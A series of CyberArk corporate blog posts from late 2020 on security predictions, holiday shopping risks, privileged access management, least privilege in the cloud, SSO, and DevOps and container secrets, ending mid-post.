It’s because of these islands of security that we’ll see the attack cycle move away from broad “spray and pray” social-engineering attacks to more hyper-personalized attacks targeting those users with privileged access to sensitive systems, data, and infrastructure.

Where attackers generally rely on lateral movement – seeking any foothold and working to elevate access and move across the network to get to their desired destination – these islands now limit the attacker to whatever high levels of access their specific target has been granted. As a result, we’ll see a move toward vertical movement – with attackers targeting individuals, like business users, based on what they have access to – from administrative consoles and financial records to competitive data.

While this new “personalized attack chain” approach will be more time consuming and costly for attackers as they look to identify and profile the exact person they are looking for, it will also lead to shorter attack cycles – making it more difficult for organizations to identify and stop attacks before they impact the business.

-Shay Nahari, Head of Red Team Services

Deepfakes Appear in Enterprise Attacks

Can something be overhyped and an emerging threat?  This is where we are with deepfakes – a term that is simultaneously overused and an example of how attackers will continue to personalize their attacks.

In simple terms, deepfakes are synthetic or manipulated media in which a person in a video or image is replaced with someone else’s likeness. From a cultural standpoint, the concept of deepfakes has dominated news cycles as a potential threat that could influence public opinion, damage reputation, and more. Often, these attacks make headlines but end up relatively empty when it comes to effectiveness.

However, as the personal attack chain trend evolves, we’ll see the emergence of deepfakes used more in enterprise attacks – not to sow mass confusion or chaos necessarily, but more to amplify social engineering attacks.

For example, video and recordings of executives and business leaders are readily available across marketing collateral, social media channels, and more. Attackers could coordinate deepfakes from these properties as a strategic follow-on to phishing attempts (which will also move away from email to other platforms like chat and collaboration apps) to make manipulated communications feel even more authentic. Especially in today’s day and age where more and more organizations are relying on video as a way for executives to communicate with their remote employees, attackers can take advantage of this instilled level of trust.

For example, phishing emails spoofing IT asking for passwords are common – but what if that email was followed by an urgent message from the CEO on WhatsApp?  Attackers could also use manipulated videos of executive leaders on social channels to entice customers, employees, partners, and others to click on malicious links – creating broader new attack avenues for malicious actors.

-Nir Chako, Cyber Research Team Leader, CyberArk Labs

5G Leads to Biggest DDoS Attack Yet

We’ve already started to see how the adoption of technologies like 5G, IoT and cloud are driving new frontiers for business – and this will continue in 2021. For 5G in particular, while it allows businesses to speed up digital transformation and create dynamic customer experiences, it is also expanding the attack surface exponentially as more and more interconnected devices come online – and opening organizations up to new risks.

Google recently revealed that it was hit with a massive 2.5Tbps DDoS attack in 2017 – the largest such attack ever recorded – even topping the 2.3 Tbps attack that targeted Amazon in 2018.  Comparatively, these attacks were 4x the scale of the massive Mirai botnet attacks of 2016 that compromised more than 600,000 IoT devices and endpoints.

As 5G is rolled out across the globe, these attacks will pale in comparison to the massive, and more frequent, DDoS attacks 5G will enable. 5G will increase the overall bandwidth available and allow a massive amount of IoT devices to be connected. Because there is still no standard for IoT security, these devices are often easy to compromise and control as part of amassing a botnet army.

As a result, we’ll see the first-ever 5Tbps DDoS attack being launched within the next year. The 2Tbps attacks thwarted by Google and Amazon will become more commonplace – causing massive disruption of online and connected businesses.

-Bryan Murphy, Director of Consulting Services

Pandemic-Led Pressure Cracks Insiders and Drives Bad Decisions

The pandemic has created tremendous pressure on employees and their families. Economic uncertainty and the move to remote work and school have put many in uncharted territory. These new challenges could likely drive more employees to make poor decisions when it comes to cybersecurity and create a whole new wave of insiders.

As we’ve already seen in 2020, attackers are increasingly offering employees with privileged access tempting financial incentives to share or ‘accidentally’ leak their credentials. In addition, privileged access on the dark web is more popular than ever, with some reports indicating that attackers will pay a premium for privileged access to corporate networks, VPNs and workstations.

The potential financial payoff, combined with increased economic anxiety, will drive new threats that organizations will struggle to deal with.

-David Higgins, Technical Director

]]>
When Every Day is Cyber Monday, Attackers Can Score Big https://www.cyberark.com/blog/when-every-day-is-cyber-monday-attackers-can-score-big/ Tue, 24 Nov 2020 04:15:12 +0000 https://www.cyberark.com/?p=105231 Cyber Monday Everyday

Back in the seemingly footloose and fancy-free pre-Covid-19 age, shopping holidays were also rooted in pre-New Normal reality. But since last spring, our offline and online lives have further blurred, and merchant focus on one-off shopping holidays has shifted to meet the always-on, always-home behaviors and preferences of consumers in physical limbo.

Unsurprisingly, nearly 70% of consumers say they’ve increased online shopping in the last six months. Now that we’re fully stocked with paper towels, many people are ready to pounce on “essential” holiday must-haves like the new Sony PS5 – and we’re not waiting until Cyber Monday, which is starting to feel like a quaint relic of yesteryear.

This surge in eCommerce activity has opened floodgates of opportunity for cyber attackers looking to cash in on rapid change. With the holidays just around the corner, how will our “new normal” impact seasonal shopping habits, and what does it mean for cybersecurity? What risks are consumers willing to take to get that gift?

Black Friday and Cyber Monday Holiday Shopping Survey

Download image here

The Disappearance of Black Friday and Cyber Monday

Over the last six to eight months, retailers have been eager to court customers who have cautiously curtailed spending during this time of uncertainty by offering deep discounts and adapting to changing shopper behaviors.

Instead of waiting for Black Friday and Cyber Monday, many began dropping deals during the fall. Amazon, Best Buy, Macy’s, and Target were among many retailers to release their biggest Black Friday discounts in October – nearly two full months before the official start of the holiday shopping season.

Consumers are gladly taking advantage of these early digital deals, jumpstarting their holiday shopping while skipping the crowds and irritating mall music. In fact, according to The CyberArk Holiday Shopping Security Survey, more than half of respondents (53%) say they won’t participate in the traditional shopping “holidays” like Black Friday or Cyber Monday this year. Either they believe good discounts are always available in this day and age, or they’ve started their shopping extremely early because of expected shipping delays. Either way, the holiday shopping season – at least in 2020 – will not be limited to a few marathon days.

With shoppers spending more time online and spreading out their spending over months, what should we know about rising attacker opportunities?

Cyber Attackers and the New Retail Reality

The spike in online shopping and digital advertising is also creating more opportunities for attackers – who are looking to take advantage of unsuspecting consumers – many of whom admit to risky shopping habits.

For example, 65% of consumers admit to saving passwords and credit cards on their devices. Sure, it’s convenient to make a quick purchase, but there’s a major downside. Credit card numbers saved in a browser can be enticing targets for phishing attacks.

Further, anyone who has waited weeks (or months!) for toilet paper to get delivered from Amazon or your favorite big-box retailer knows that many manufacturers are having a tough time keeping up with demand. Anticipating supply chain issues this season, 57% of consumers say they would be willing to shop at unfamiliar online stores in order to score the perfect holiday gift on time. Okay. Your kid really needs a Star Wars Mandalorian Darksaber — and you’re running out of time. So you search around, finally find one from a retailer you’ve never heard of – but they have it in stock. You punch in your credit card number with glee. Yet fraudsters set up fake typosquat websites to trick online shoppers into disclosing sensitive information all the time. Before making a purchase, it’s important to do some research on the retailer. Are they reputable? Do they have the “https” and closed padlock icon in the browser? While these intended symbols of security don’t always protect the consumer, they can be a reliable indicator of safety.

It’s not that consumers don’t recognize the risks of online shopping. Only 26% are totally confident in retailers’ ability to secure their transactions and privacy – but consumer awareness hasn’t translated to action. And today, convenience often trumps caution.

The year 2020 has “gifted” us all with a host of unanticipated scenarios and challenges, some of which threaten online security and privacy. Don’t let holiday shopping be one of them.

Employers, Beware: Employee Shopping Habits Have a Dangerous Ripple Effect

Unfortunately, risky consumer shopping habits put more than personal devices and information in danger. Thirty percent of respondents admit to using their corporate devices to shop online, while 27% allow household members to use their corporate devices to shop online. These behaviors threaten corporate security. All it takes is one compromised credential on one employee laptop to potentially cause costly business damage and disruption.

While “Christmas Every Day” makes for great Hallmark Channel movie material, an extended holiday season isn’t all holly and jolly. Nearly three months of digital deals mean cyber attackers have significantly more time to spoof employees with holiday-themed phishing emails, websites, social media scams, and more. Stay vigilant, and as you look to the year ahead, make sure organizational cybersecurity strategies align with new realities and consumer behaviors. Because as it turns out, shopping for everything from groceries to cars is pretty convenient and comfortable from the couch – and it’s not going away anytime soon.

The CyberArk Holiday Shopping Security Survey, 2020 was conducted in October 2020 by an independent research agency. The study included responses from 2,000 consumers in the United States, UK, France, and Germany.

]]>
CyberArk Named a Privileged Identity Management Leader https://www.cyberark.com/blog/cyberark-named-a-privileged-identity-management-leader/ Wed, 18 Nov 2020 15:12:03 +0000 https://www.cyberark.com/?p=104795 Privileged Identity Management Leader

There’s never been a better time to be a cyber attacker. The mobile, cloud, and digital world is opening new doors and pathways to organizations’ most valuable assets. Stopping every attack is now out of the question.

At CyberArk, we believe proactive protection must center on securing and managing access for the thousands of human, application, and machine identities that exist in modern IT environments — any of which can become privileged at any moment, depending on what they’re accessing or doing. According to Forrester*, “machine identities are growing at twice the rate of human identities.” Layer on top of that expanding use cases for cloud, DevOps, and IoT – and the opportunities for attacker compromise are plentiful.

Today, independent research firm Forrester Research released The Forrester Wave™: Privileged Identity Management, Q4 2020.* For the report, Forrester evaluated the 10 most significant privileged identity management (PIM) vendors and identified CyberArk as a Leader.

CyberArk received the highest score in the “Current Offering” category and received the highest possible scores in 16 criteria, including threat monitoring and security, SaaS/cloud, remote access and support, execution roadmap, and innovation roadmap, among others.

This is the third in a series of recognitions as a leader this year by top global analyst firms that, in our opinion, reflect CyberArk’s solid strategy execution, unwavering commitment to innovation, and strong customer satisfaction.

In a year fraught with uncertainty, we’ve remained focused on delivering proven solutions and services that reduce risk and simplify operations so customers can securely implement digital transformation initiatives, including accelerating cloud migration, to drive their business forward and support a growing legion of remote workers.

Earlier this year, we unveiled our Identity Security vision that starts with Zero Trust and uses artificial intelligence to understand context and intent, and took the first step in delivering on this strategy. According to the Forrester report, “CyberArk’s $70 million acquisition of IDaaS provider Idaptive in May 2020 signals a major move to expand beyond its core competency and provide secure access for the entire workforce.”

We’ve continued that momentum throughout the year and are constantly innovating to raise the bar to deliver unparalleled security for our customers. Just last week we introduced CyberArk Cloud Entitlements Manager, a privilege-based, AI-powered service that removes excessive permissions to strengthen the security of cloud environments. Part of our expanding SaaS portfolio, this latest innovation further solidifies CyberArk’s market leadership position while making it easier and faster for organizations to improve their security posture by aligning with least privilege principles.

This “make it simple” mantra extends to our evolving strategy to make it even easier for customers to purchase, deploy and scale our solutions – including a broad range of just-in-time capabilities for improved privileged access control and an expanding subscription model.

We’ve also rolled out new services to help organizations develop and mature their privileged access and identity management programs. Drawing on our experience with more than 6,300 customers, the CyberArk Blueprint offers prescriptive guidance for securing privileged access everywhere: in the cloud, on employee endpoints, in SaaS applications, within automated workflows, throughout DevOps pipelines, and more.

According to the report, “CyberArk boasts industry-leading security capabilities across the portfolio, along with very good threat monitoring. The performance, scalability, and resilience of the offerings have been proved out by many large customers.”

We take great pride in this milestone, which we share with each of our customers, partners, and employees. Thank you for inspiring and driving us to continuously reimagine what’s possible.

To learn more, download a complimentary copy of The Forrester Wave™: Privileged Identity Management, Q4 2020 Report. Stay tuned for another great year of industry-leading innovation in 2021.

1 – The Forrester Wave™: Privileged Identity Management, Q4 2020 by Sean Ryan and Elsa Pikulik with Merritt Maxim, Benjamin Corey, and Peggy Dostie, November 18, 2020

 

]]>
Secure Your Cloud Native Applications and DevOps Pipeline in Six Steps https://www.cyberark.com/blog/secure-your-cloud-native-applications-and-devops-pipeline-in-six-steps/ Tue, 17 Nov 2020 16:06:00 +0000 https://www.cyberark.com/?p=104784 DevOps Pipeline and Cloud-Native Application Security

Editor’s Note: This is part three of a blog series on securing privileged access and identities in the cloud.

DevOps is transforming how organizations across industries from banking to eCommerce to healthcare build and deliver cloud-native applications. With DevOps, new application functionality can be delivered in rapid iterations and at scale, driving agile innovation to meet increasing customer demands and build competitive advantage.

A recent Harvard Business Review Analytic Services study found that roughly two-thirds of respondents use DevOps, and see benefits that impact their bottom line, including increased speed to market (identified by 70% of respondents), productivity (67%), customer relevance (67%), innovation (66%), and product/service quality (64%).

Using continuous integration methods (CI), developers merge code changes to a repository multiple times a day, which are automatically integrated into builds. Through continuous delivery (CD), code is always in a deployable state so it’s ready for release into production at the touch of a button.

As custom-built cloud applications are built and delivered using these agile DevOps practices, they rely on API access keys for dynamic connection to other applications and resources. Sometimes referred to as “API keys,” these powerful credentials are used to authenticate applications and DevOps automation tools and enable programmatic requests to the cloud environment. API keys can be used for virtually anything, from provisioning a container to copying a database to allowing one service to access data from another. Attackers have used API access keys — stolen from phished endpoints or inadvertently posted to public code repositories and other sources — to steal customer data and valuable intellectual property or destructively delete source code.

Many of the DevOps tools used to orchestrate development and delivery of custom-built cloud applications are also highly privileged. For example, CI/CD tools for configuration management, such as Ansible, and those used to run automated tests and builds, like Jenkins. Since these “tier 0” tools enable full control of the environment, admin access must tightly be controlled and restricted to reduce exposure.

Here are six steps for securing privileged access to custom-built cloud applications and in the DevOps pipeline where they’re created and deployed:

1. Remove all embedded API keys and secrets from source code, scripts, and automation tools. DevOps culture emphasizes collaboration and code sharing. It’s common practice to post-application code to GitHub and other public repositories. Yet too often, this code contains embedded API keys and other credentials and secrets, and attackers troll these repositories to locate and abuse them. Stay a step ahead by removing hard-coded credentials completely. Similarly, never provide human users with direct access to API keys.

2. Proactively secure all API keys and secrets in a secure digital vault that supports strong privileged access controls. Only allow access to authorized, verified users and applications under centralized, corporate-wide access policies.

3. Enforce least privilege access controls for all DevOps tools, including admin consoles as well as highly privileged human users. Follow strong privileged access management best practices, such as rotating privileged credentials and monitoring and recording privileged access activity for human and automated users.

4. Apply consistent, enterprise-wide security policies to the tools and admin consoles used at each specific stage of the DevOps pipeline: plan, code, build, test, release, deploy, operate, monitor.

5. Leverage single sign-on (SSO) and multi-factor authentication (MFA) to solve pervasive password challenges and strengthen Identity Security when granting DevOps access to any highly privileged human user.

6. Perform regular audits to identify gaps and privilege-related risk and to continuously improve overall security posture.

Consistency Is Key

The most effective cybersecurity programs enforce identity and privileged access policies consistently across their entire organization — regardless of infrastructure, application mix, or development philosophy. This must be done at scale to keep pace as the organization and its cloud workloads evolve to support digital transformation and flexible work models. This can only be achieved from a centralized point of control that enables consistent management of privileged credentials, human and non-human identities, devices, and secrets across multi-cloud and hybrid environments.

Learn more in our eBook, “Securing Privileged Access and Identities In 5 Key Cloud Scenarios” and our cloud security resources. The next post in our series will tackle SaaS application security, a top-of-mind concern for nearly every digital business today.

]]>
A Zero Trust Approach to Protecting Cloud Identities Begins with Least Privilege https://www.cyberark.com/blog/a-zero-trust-approach-to-protecting-cloud-identities-begins-with-least-privilege/ Mon, 09 Nov 2020 12:46:22 +0000 https://www.cyberark.com/?p=104620 Zero Trust Starts with Least Privilege

The world is changing quickly. Digital transformation initiatives and new services from cloud providers are creating an explosion of identity-based permissions. Through the eyes of an attacker, each cloud identity represents a potential opportunity and first step toward a company’s most valuable assets.

Today we are proud to unveil CyberArk Cloud Entitlements Manager, an artificial intelligence-powered cloud security service that centralizes visibility and control across cloud environments, helping organizations strategically remove excessive permissions that pose a security risk.

CyberArk Cloud Entitlements Manager is a key component of our Identity Security strategy, which reflects that any identity can become privileged in modern IT environments. Cloud Entitlements Manager takes a Zero Trust approach to reducing risk and improving visibility across cloud environments – built on the principle of least privilege.

 

Least Privilege Access: A Core Tenant of Zero Trust

Adoption of public cloud services, SaaS applications, and remote access have dissolved the traditional network perimeter. This establishes identity as the key line of defense for most organizations and the de facto ‘new perimeter.’ As modern Zero Trust models take hold, authentication and authorization of all identities become paramount. In cloud environments, any human or machine identity can be configured with thousands of identity and access management (IAM) permissions to access cloud services containing sensitive information. User, group and role identities are assigned permissions depending on their job functions. Many organizations unintentionally configure their various identities with permissions to access cloud services they don’t actually use or need.

These excessive permissions pose a major challenge for organizations as they move toward Zero Trust security frameworks, which demand that every identity attempting to access corporate resources be verified and their access intelligently limited. A recent ESG survey, sponsored by CyberArk and other technology vendors, found over-permissioned accounts and roles as the top-ranked cloud service misconfiguration. Not surprisingly, attackers have taken notice: the same survey ranked overly permissive privileges as the most common attack vector against cloud applications*.

By compromising a cloud identity with overly broad permissions, an attacker can access critical workloads undetected or escalate their privileges to steal cloud-hosted data, disrupt high-value applications or even take entire cloud deployments offline.

To address this challenge, implementing least privilege, in which all identities have only the minimum necessary entitlements to perform their ongoing responsibilities, is an established best practice for organizations on their Zero Trust and cloud journeys. Establishing least privilege also limits the number of entities that can grant or configure new permissions, making it difficult for attackers to escalate privileges and reach their goals.

Here are four reasons to introduce or extend least privilege to your cloud environments.  

1. Data Breaches Are Increasingly Linked to Cloud Identities

Digital transformation only moves forward. As businesses shift their attention to the cloud, so do attackers. But while attackers are targeting new environments, they rely on the same old tactics. The 2020 Verizon Data Breach Incident (DBIR) identified that identities remain the weakest link in most organizations, as credential theft was employed in 77% of cloud breaches.

These trends reinforce the case for least privilege access in cloud environments. In a least privilege model, organizations proactively protect themselves from insider threats while greatly limiting the potential damage of external attacks. A compromised identity in a least privilege framework can’t immediately access resources outside of that identity’s standard job responsibilities. Least privilege, therefore, limits attacker movement and protects mission-critical workloads, buying valuable time to detect and respond to an attack.

2. Accelerated Cloud Adoption Expands the Attack Surface. Least Privilege Shrinks It.

More cloud services. More identities. More risk. Several aspects of cloud environments make proper configuration of privileges and permissions a challenge. Cloud IAM roles for certain application services can be provided with a wide range of permissions to limit possible developer friction. A thorough entitlements audit process may identify such excessive permissions and limit them to the least privilege required for this service to work properly. Other organizations fail to account for outdated permissions, such as failing to remove developer access to storage buckets and container pods at the close of a project.

Both scenarios are equally dangerous, as an attacker compromising either of these identities can increase their chances of escalating privileges or reaching mission-critical data undetected. Establishing and continuously validating least privilege is a critical step to shrinking the attack surface, lowering risk by dissuading insider threat actors, and impeding external attackers.

3. Cloud Services Are Multiplying. So Are Misconfiguration Risks.

The leading infrastructure as a service (IaaS) platforms – Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform (GCP) – are constantly introducing new services to differentiate from other platforms. This blistering innovation boosts business productivity, as powerful tools for specialized needs like data streaming, blockchain networking and Internet of Things (IoT) analytics are more accessible than ever before.

But that accessibility can come at a price. Configuration of cloud services is challenging for any organization, and one simple misconfiguration can open doors for attackers. The 2020 IBM Cost of a Data Breach report found attackers used cloud misconfigurations in nearly 20% of data breaches.

Least privilege models place emphasis on managing permissions to identify potential misconfigurations that result in excessive, unauthorized access to key cloud services, mitigating risk while enabling necessary access to advanced workloads.

4. Cloud Provider, Industry and Regulatory Frameworks Recommend Least Privilege

Recognizing the dangers of over-permissioned identities and the difficulty of securely configuring services in immense cloud environments, AWS, Azure, and GCP all specify least privilege access as a security best practice.

Consortiums like Cloud Security Alliance’s Cloud Control Matrix also stress the importance of continuously reviewing permissions. Meanwhile, highly regulated organizations can even face financial penalties if breached for failing to establish least privilege. Organizations should continuously verify least privilege across their on-premises and cloud workloads to ensure compliance.

Least privilege is recognized as a security best practice for a reason. But it cannot come at the expense of end-user productivity or overburden IT teams. Effective least privilege enforcement brings the right mix of privileged access management practices together with flexible controls to balance security and compliance requirements with operational and end-user needs.

Implement Least Privilege Across Your Cloud Estate

Born out of CyberArk Labs, CyberArk Cloud Entitlements Manager provides cloud-agnostic visibility and granular, AI-powered remediation of excessive permissions, so organizations can consistently implement least privilege while preserving necessary access to drive operational efficiency.

We’re proud of the solution’s user experience, too; in under one hour, CyberArk Cloud Entitlements Manager can take customers from subscription to AI-powered remediation, while calculating exposure-level analysis for all identities, environments and platforms in an organization’s AWS, Azure, GCP and AWS Elastic Kubernetes Services environments.

Discover how our latest innovation empowers organizations to operate cloud services securely and efficiently. Join our virtual launch event for demonstrations and a free trial opportunity, and hear from CyberArk customers and executives.

*ESG eBook, Trends in IAM: Cloud-driven Identities, October, 2020

 

]]>
Four Reasons to Strengthen Identity Security with SSO https://www.cyberark.com/blog/four-reasons-to-strengthen-identity-security-with-sso/ Tue, 03 Nov 2020 16:28:43 +0000 https://www.cyberark.com/?p=104356 Strengthen Identity Security with SSO

While it’s widely accepted that the “perimeter is dead,” current realities are forcing many organizations to evolve their security approaches faster than planned.

Traditional firewall and VPN-based security models simply weren’t built to protect the highly distributed IT environments of today. As organizations adopt cloud and hybrid infrastructure, embrace an increasing number and variety of SaaS applications, and encourage employees to work remotely, it’s clear that identity really is the only true perimeter. Effective enterprise security today hinges on the ability to securely manage and authenticate identities and control privileged access for every human, application, and machine – whether they’re within or outside of the network perimeter.  In today’s environment, all identities can become privileged under certain conditions, based on the systems, environments, applications, or data they’re accessing, or the types of operations they’re performing.

The Problem with Passwords

With this as a backdrop, it’s not surprising that cyber criminals target privileged user credentials above all else – based on the tremendous access they can provide to an organization’s most critical data and infrastructure. According to the 2020 Verizon DBIR report, more than 80% of data breaches tied to hacking involve the use of lost or stolen credentials or brute force. With compromised privileged credentials, attackers can access internal resources, obtain confidential data and disrupt the business. Yet many organizations continue to rely on passwords to secure user credentials. This is a problem for numerous reasons.

There are over 300 million fraudulent sign-in attempts to Microsoft Services each day, and yet, 53% of users haven’t changed their passwords in the last 12 months. Even if they have, chances are good the new password is weak or used in multiple places. According to a Google study, 52% of people use the same password for multiple accounts.

Of course, many organizations have taken measures to secure identities, such as mandating unique passwords, requiring frequent password changes and enforcing password complexity policies. However, these controls can actually do more harm than good, by driving end-users to adopt risky password practices (like writing them down!) and putting unnecessary burden on IT teams charged with manually managing access.

Remembering, forgetting, entering and resetting passwords is a giant pain and productivity suck. Especially in the era of remote work where employees and third-party vendors rely heavily on applications to collaborate and access corporate resources. Today’s typical employee loses about 12.6 minutes per week entering and resetting their passwords. A PwC study found about 30% of all help desk calls are related to passwords, which pulls valuable IT resources away from more strategic initiatives. Some simple calculations put the productivity cost of using passwords at approximately $725 per employee per year.

Four Reasons to Add SSO to Your Security Toolkit Today

Single sign-on (SSO) solves this pervasive password problem and shrinks the attack surface by enabling organizations to:

1. Consistently enforce stronger password policies and reduce the risk of poor password practices by eliminating the need for individual passwords altogether. With SSO, organizations can utilize a single secure identity for all applications, endpoints and resources.

2. Enhance the end-user experience by enabling one-click access to assigned cloud and on-premises applications for both local and remote users. To help keep workers productive and moving at the speed of business, some SSO solutions only require additional security controls for high-risk, privileged access requests.

3. Break down silos and simplify the management of users and accounts with seamless directory integrations.

4. Gain comprehensive visibility into users’ access activity – helping to meet compliance requirements around access, ease reporting and improve overall security posture.

Not All SSO Solutions Are Created Equal

The immediate benefits of SSO are clear: by bolstering Identity Security controls, organizations can reduce risk, enhance user experiences and simplify access to corporate resources, all while easing the burden on IT.

However, there are many additional, long-term benefits organizations can realize by implementing SSO solutions that are frequently overlooked during initial discussions. For example, with properly configured self-service tools, companies can significantly reduce their IT costs by reducing the number of password-related help desk tickets and calls. In addition, SSO can eliminate the possibility of accounts that remain active when employees change roles or leave the company. The right SSO solutions can even extend security capabilities beyond passwords to include multi-factor authentication (MFA) and passwordless authentication methods.

Join our on-demand webinar, “The Extended Benefits of Single Sign-On Solutions,” to explore the benefits of modern SSO and key considerations to help you to select the best solution for your organization.

 

 

 

 

]]>
Cybersecurity Horror Stories That Make Us Scream with Fright https://www.cyberark.com/blog/cybersecurity-horror-stories-that-make-us-scream-with-fright/ Fri, 30 Oct 2020 14:43:40 +0000 https://www.cyberark.com/?p=104112 Cybersecurity Horror Stories

Editor’s Note: The digital world can be a scary place. Whether lurking in the shadows of the dark web or hiding in plain sight, cyber spooks are out to trick and terrify you, with no treats insight. It’s no coincidence that National Cybersecurity Awareness Month and Halloween share a spot on the calendar.

In the spirit of the season, we sat down with Bryan Murphy, director of consulting services at CyberArk, and leader of our remediation services team. With more than 20 years of cybersecurity experience*, Bryan has seen or read about nearly every ghoulish threat and dastardly data breach imaginable. Here, he describes some of the stories, trends, and risky practices that keep him up at night. Read on… if you dare.

Cringe-worthy Passwords

I once worked on a large-scale server build project. The team was using a default password, which I guessed – without even meaning to – while describing an example login scenario. Beware, a company-related acronym or stock symbol plus “123” does not make for a strong password. If you think adding a simple exclamation point at the end will save your administrative accounts and servers from impending doom, think again. And remember, resurrecting the ghosts of passwords past for reuse, or using the same ones across multiple systems will surely come back to haunt you.

A Perfect Cybersecurity Storm Is Brewing

Last spring, many people thought that cutting out commutes and working from home would give them more time to focus on other endeavors – like family, friends, hobbies, even exercise. Reality quickly sunk in as schools closed, responsibilities shifted or increased, and in many ways, life got even more hectic than before. As the FBI reported a 400% spike in cyber attacks, including targeted hits on remote access tools, corporate security boundaries relaxed and employees adopted risky habits in the name of efficiency and productivity. Today, workers are multi-tasking like never before – they can shop online, homeschool their kids, and do domain administrative work on corporate systems – all from the same device. It’s like watching every scary movie cliché at once. What could possibly go wrong?

The Masked Insider Threat

It’s hard to spot a malicious insider in your midst, and even harder when it’s an outsider masquerading as a legitimate employee. Consider the recent Twitter attack, where a motivated external attacker used compromised insider access to gain powerful levels of system access to execute a financially motivated social engineering scheme. Incidents like this remind us that trust is not a security policy and that devils often hide behind angel costumes. Strong privileged access controls cannot be an afterthought. Embed them into your design process from the start – be sure to actively monitor access – and stop spending your days looking over your shoulder.

When Nightmares Become Reality

Increasing attacks on critical infrastructure have the potential to paralyze entire cities or weaponize connected systems. Crippling ransomware attacks are forcing healthcare organizations to make impossible life-or-death decisions. This fall, a German hospital was hit by a ransomware attack. The resulting outage forced a woman with a life-threatening condition to travel to an alternate facility about 20 miles away. She died after a significant delay in treatment. I’ve been asked, “What do we do first? Bring back our servers or get the lights on in surgery?” Just this week, several federal agencies warned hospitals about “credible” information “of an increased and imminent cybersecurity threat to U.S. hospitals and healthcare providers” while COVID-19 cases and hospitalizations surge around the country.

No organization today can outrun the bogeyman. There is no silver bullet. Fortunately, many of the risks we face can be vanquished by staying vigilant and following fundamental security best practices like patching software, securing privileged credentials and identities, enforcing the principle of least privilege and backing up data. Remember, cybersecurity is a journey, not a final destination, and you don’t need to go it alone.

Stay safe out there and keep fighting the good fight. Happy Halloween.

*Note that these experiences are personal anecdotes and reflective of examples gathered throughout Bryan’s career and are not limited to his work at CyberArk

]]>
Best Practices for Protecting Your Organization’s Dynamic Cloud Infrastructure https://www.cyberark.com/blog/best-practices-for-protecting-your-organizations-dynamic-cloud-infrastructure/ Thu, 29 Oct 2020 14:25:11 +0000 https://www.cyberark.com/?p=104098 Protecting Your Cloud Infrastructure

Editor’s Note: This is part two of a blog series on securing privileged access and identities in the cloud. Read part one on securing the root-level account and cloud management console.

A major benefit of cloud-based infrastructure is that new virtual machines (VMs), storage, containers and more can be provisioned dynamically as needed. This allows organizations to use cloud resources flexibly based on evolving demands, scaling up when needs surge and scaling down when needs decrease.

Every time a virtual machine or infrastructure resource is dynamically initiated and launched, it is assigned privileged credentials, such as SSH keys. This provisioning process doesn’t necessarily happen automatically. Rather, administrators may use the management console to spin up new VMs and assign the appropriate privileged credentials. No matter the nature of your cloud infrastructure today, protecting these powerful privileged credentials from the moment they’re created and throughout their lifecycle is essential.

Here are five best practices to follow as your cloud infrastructure evolves:

1. Discover all privileged entities with infrastructure access. Manually tracking and securing privileged accounts becomes increasingly difficult as your environment scales and becomes more dynamic. Privileged credentials are created – in fact need to be created – at high velocity, making it difficult for humans to manage. Automation, scripts and cloud management tools make such provisioning possible, but also make credentials hard to manage and track. To better understand your privilege-related risk landscape, take advantage of tools that enable continuous discovery of all privileged credentials, including SSH keys, passwords, password hashes, AWS access keys, and more.

2. Employ a secure, centralized repository for all privileged credentials. By leveraging strongly authenticated APIs, robust integrations, and secret injection to securely retrieve and regularly rotate SSH keys and other credentials from a secure digital vault, your organization can automatically secure credentials as they are created – at the speed the cloud requires.

3. Automatically onboard new entities and immediately secure privileged credentials associated with newly provisioned infrastructure. Once you’ve discovered all existing privileged accounts and credentials in your cloud infrastructure, consider programmatic management for new privileged entities via onboarding APIs to dramatically streamline management and improve operational efficiency.

This step is particularly important in the cloud as infrastructure is automated and containers, servers and other resources are provisioned and used for just minutes or hours to complete a specific task. This happens numerous times each day without any human interaction. Auto-scaling in the cloud means VMs and resources are kicked into gear programmatically. To effectively secure privileged access, SSH keys used to access VMs programmatically must be automatically onboarded and secured with vaulting and rotation as new cloud instances are spun up.

4. Manage the infrastructure credentials using just-in-time privileged access management. Organizations just getting started with the cloud may choose to grant access to medium- to long-term VMs via traditional standing access with privileged credentials that are vaulted and rotated. This is an important first step, as it allows organizations to quickly bolster cloud infrastructure security.

As organizations progress on their cloud journey, infrastructure scales faster and is spun up and down in seconds based on needs. This requires a different, more dynamic approach to privileged access management. Just-in-time access grants users (human, machine or application) elevated access to sensitive resources for a specific amount of time in order to perform a necessary task.

In other words, it gives the right user the right access to the right cloud resource at the right time (and only as long as its required) for the right reasons. Together with privileged session monitoring capabilities, just-in-time access helps strengthen access controls to protect cloud VMs.

5. Automatically remove privileges when the infrastructure is de-provisioned. The ability to remove privileged access quickly, and with precision, is critical to reducing risk. Automating this process will streamline internal IT operations and improve outcomes.

Cloud Infrastructure Access is an Evolving Journey

Cloud infrastructure environments are not static; your cloud security approach shouldn’t be either. If you’re looking for tips along the way, check out our eBook, “Securing Privileged Access and Identities In 4 Key Cloud Scenarios” and our cloud security resources. Stop back soon to explore part three of our series on securing cloud-native applications and the DevOps pipeline.

]]>
Ramp Up Container Security With Red Hat OpenShift and CyberArk https://www.cyberark.com/blog/ramp-up-container-security-with-red-hat-openshift-and-cyberark/ Thu, 22 Oct 2020 20:20:24 +0000 https://www.cyberark.com/?p=104002 Microservices and containerized approaches are becoming increasingly critical elements of digital transformation strategies. Container platforms offer developers and operations teams a simplified way to build and deploy better applications faster across hybrid cloud environments, and at scale. In fact, a recent Capital One study shows 86% of technology leaders have prioritized container usage for more applications, largely to improve collaboration between developers and operations (50%) and enhance the developer experience (46%).

Red Hat® OpenShift® is one of the leading container platforms, providing enterprises with a consistent foundation and set of services for building and scaling containerized applications across hybrid environments. OpenShift leverages the underlying capabilities of the popular open source container orchestration platform, Kubernetes (K8s).

Today, several thousand enterprises use OpenShift to migrate application workloads to the cloud, as well as develop cloud-native applications using DevOps methodologies at scale. All of these applications use credentials, or secrets, to access databases and other sensitive resources – credentials that must be managed and secured the same way human access is. However, in a typical enterprise compute environment, OpenShift is likely just one of several platforms being used. This means credentials must be shared across multiple IT platforms, CI/CD tools, as well as cloud and hybrid environments. If these credentials are exposed, attackers can use them to escalate access and privilege, reach critical assets and cause significant harm – from exfiltrating or maliciously destroying sensitive data to crypto-jacking cloud resources.

